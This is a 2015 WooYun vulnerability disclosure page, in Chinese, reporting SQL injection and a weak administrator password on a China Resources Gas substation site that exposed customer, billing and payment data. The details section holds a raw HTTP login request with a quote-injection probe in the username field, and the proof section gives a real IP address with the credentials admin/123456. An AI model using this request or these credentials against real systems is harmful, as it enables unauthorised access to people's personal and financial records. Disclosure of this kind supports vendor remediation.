当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145848

漏洞标题:华润燃气某分站SQL注入附弱口令一枚(导致大量用用户信息,电费,燃气费,交易信息泄漏)

相关厂商:华润燃气(集团)有限公司

漏洞作者: 路人甲

提交时间:2015-10-10 17:53

修复时间:2015-11-26 11:50

公开时间:2015-11-26 11:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-10: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

啥时候wooyun也有这么多用户啊?

详细说明:

http://125.67.64.82:8081

8.png


POST /login.aspx HTTP/1.1
Host: 125.67.64.82:8081
Content-Length: 667
Cache-Control: no-cache
Origin: http://125.67.64.82:8081
X-MicrosoftAjax: Delta=true
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
DNT: 1
Referer: http://125.67.64.82:8081/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=t1aau4aqwpay1cn4fx5yrq55
ScriptManager1=UpdatePanel1|btnLogin&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTkwNjcwMzI0Ng9kFgICAw9kFgICAw9kFgJmD2QWAgICDw9kFgIeB29uY2xpY2sFugFpZihkb2N1bWVudC5hbGwoJ3R4dE9Db2RlJykudmFsdWU9PScnKXt3aW5kb3cuYWxlcnQoJ%2Bivt%2Bi%2Bk%2BWFpeeUqOaIt%2BWQjSEnKTtyZXR1cm4gZmFsc2U7fWVsc2V7aWYoZG9jdW1lbnQuYWxsKCd0eHRPUHdkJykudmFsdWU9PScnKXt3aW5kb3cuYWxlcnQoJ%2Bivt%2Bi%2Bk%2BWFpeeZu%2BW9leWvhueggSEnKTtyZXR1cm4gZmFsc2U7fX1kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQhidG5Mb2dpbiYMjBvqxn7rXFJDRtoOgEcxB5y%2F&txtOCode=admin'&txtOPwd=123456&__EVENTVALIDATION=%2FwEWBALa3tnODgLLm%2Ba4AQLam%2BquAQKC3IeGDPCUQnmvOXF7%2FvsFEb66ynJSp3l0&btnLogin.x=49&btnLogin.y=10


大量的数据,但是管理员这些个MD5解不出来,还有银行交易金额

1.png


2.png


5.png


6.png


7.png


漏洞证明:

送一枚弱口令
http://125.67.64.82:8081/
admin 123456

3.png


4.png

修复方案:

过滤
跟换用户密码

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-10-12 11:48

厂商回复:

感谢提交

最新状态:

暂无